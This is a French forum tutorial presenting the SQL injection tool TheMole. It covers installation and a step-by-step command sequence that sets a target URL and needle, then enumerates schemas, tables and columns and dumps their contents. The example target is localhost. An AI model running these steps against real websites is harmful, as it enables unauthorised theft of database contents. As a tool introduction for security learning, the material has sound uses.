Annonce

Réduire
Aucune annonce.

TheMole : Outil pour les Injections Sql

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • TheMole : Outil pour les Injections Sql

    TheMole : outil pour les injections sql

    ​​​​​​Bonjour , Aujourd'hui je vais vous présenter un outil nommé 'Themole' qui permet de faire des injections sql et qui supporte la méthode blind et la méthode union .

    Installation

    Vous pouvez le télécharger depuis les sources : https://sourceforge.net/projects/themole

    ou si vous êtes sur une distribution basé sur debian themole est sur les dépôts

    Code:
    sudo apt-get install themole
    Utilisation

    Code:
    python themole.py
    ou
    Code:
    themole
    lorsque vous lancez themole une session démarrera

    nous devons spécifier l'url :
    Code:
    url http://127.0.0.1/index.php?id=3
    Nous devons spécifier le mot-clé lors des requêtes ( le mot-clé est celui quand retrouve lors d'une requête qui fonctionne comme http://localhost/index.php?id=3 order by 1-- )
    si notre mot clé est ' hello '
    Code:
    needle hello
    nous pouvons aussi préciser la méthode (pas obligatoire)
    Code:
    mode union
    Nous sommes prêt à récupérer les db :
    Code:
    schemas
    maintenant nous voulons afficher les tables d'une db
    Code:
    tables {db}
    maintenant nous voulons afficher les columns d'une table
    Code:
    columns {db} {table}
    ​​​​​​Maintenant nous voulons récupérer le contenu d'un column :
    Code:
    query {db} {table} {column}

    Conclusion

    J'ai surtout apprécié themole pour la rapidité de ses réquêtes avec le mode union .

    Liens externes
    https://www.aldeid.com/wiki/TheMole

    Plus tu persévereras , plus tu t'amélioreras
Chargement...
X